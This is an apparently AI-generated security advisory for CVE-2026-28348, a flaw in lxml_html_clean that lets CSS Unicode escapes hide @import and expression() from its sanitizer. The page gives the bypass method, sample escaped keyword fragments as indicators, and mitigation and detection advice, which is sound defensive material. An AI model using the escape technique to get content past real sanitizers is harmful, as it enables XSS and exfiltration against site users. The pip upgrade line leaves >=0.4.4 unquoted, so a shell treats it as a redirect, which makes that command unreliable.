CVE-2026-28348 Overview
CVE-2026-28348 is a Cross-Site Scripting (XSS) and CSS injection vulnerability in lxml_html_clean, a Python project that provides HTML cleaning functionalities copied from lxml.html.clean. Prior to version 0.4.4, the _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This behavior allows CSS Unicode escape sequences to bypass the @import and expression() filters, enabling external CSS loading or XSS attacks in older browsers.
Critical Impact
Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.
Affected Products
- lxml_html_clean versions prior to 0.4.4
- Applications using lxml_html_clean for HTML sanitization
- Python web applications relying on lxml.html.clean functionality
Discovery Timeline
- 2026-03-05 - CVE CVE-2026-28348 published to NVD
- 2026-03-05 - Last updated in NVD database
Technical Details for CVE-2026-28348
Vulnerability Analysis
The vulnerability resides in the _has_sneaky_javascript() method within lxml_html_clean, which is responsible for detecting and filtering potentially dangerous JavaScript patterns in CSS. The method's implementation contains a flaw in how it processes CSS content before performing security checks.
When processing CSS input, the method strips backslash characters before evaluating the content against a list of dangerous keywords such as @import and expression(). This preprocessing step inadvertently enables attackers to craft CSS payloads using Unicode escape sequences that evade detection.
CSS supports Unicode escape sequences in the format \XX or \XXXXXX where X represents hexadecimal digits. By encoding characters of dangerous keywords using these escape sequences, an attacker can construct payloads that appear benign to the filter but are interpreted as valid CSS by browsers.
For example, the @import directive could be obfuscated using Unicode escapes, allowing an attacker to load external stylesheets from attacker-controlled domains. Similarly, the expression() function, which is supported in older versions of Internet Explorer, could be encoded to execute arbitrary JavaScript within style attributes.
Root Cause
The root cause is improper output encoding handling (CWE-116) in the CSS security filtering logic. The _has_sneaky_javascript() method removes backslashes from CSS content before checking for dangerous patterns, but CSS parsers in browsers will decode Unicode escape sequences after the sanitization has occurred. This creates a disconnect between what the sanitizer sees and what the browser interprets, enabling a classic filter bypass vulnerability.
Attack Vector
The attack requires user interaction where a victim must view content containing the malicious CSS payload. The attack can be delivered through any application input that is processed by lxml_html_clean, such as user-generated content, comment fields, or any HTML input that undergoes sanitization. When the sanitized content is rendered in a browser, the CSS Unicode escape sequences are decoded, and the malicious directives are executed.
The vulnerability specifically targets:
- External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
- XSS execution via the expression() function in legacy Internet Explorer browsers
The attack is network-based, requiring no privileges on the target system, but does require user interaction to trigger. The scope is changed, meaning successful exploitation can impact resources beyond the vulnerable component.
Detection Methods for CVE-2026-28348
Indicators of Compromise
- CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
- Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
- Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
- Browser console errors related to blocked CSS resources when Content Security Policy is enforced
Detection Strategies
- Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
- Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
- Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
- Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4
Monitoring Recommendations
- Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
- Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
- Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
- Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain
How to Mitigate CVE-2026-28348
Immediate Actions Required
- Upgrade lxml_html_clean to version 0.4.4 or later immediately
- Review and audit all user-generated content that may have been processed by vulnerable versions
- Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
- Consider adding secondary validation for CSS content in security-critical applications
Patch Information
The vulnerability has been patched in lxml_html_clean version 0.4.4. The fix addresses the backslash stripping behavior in the _has_sneaky_javascript() method to properly handle CSS Unicode escape sequences before security filtering.
For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.
Workarounds
- Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
- Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
- Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
- Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible
# Upgrade lxml_html_clean to patched version
pip install --upgrade lxml_html_clean>=0.4.4
# Verify installed version
pip show lxml_html_clean | grep Version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

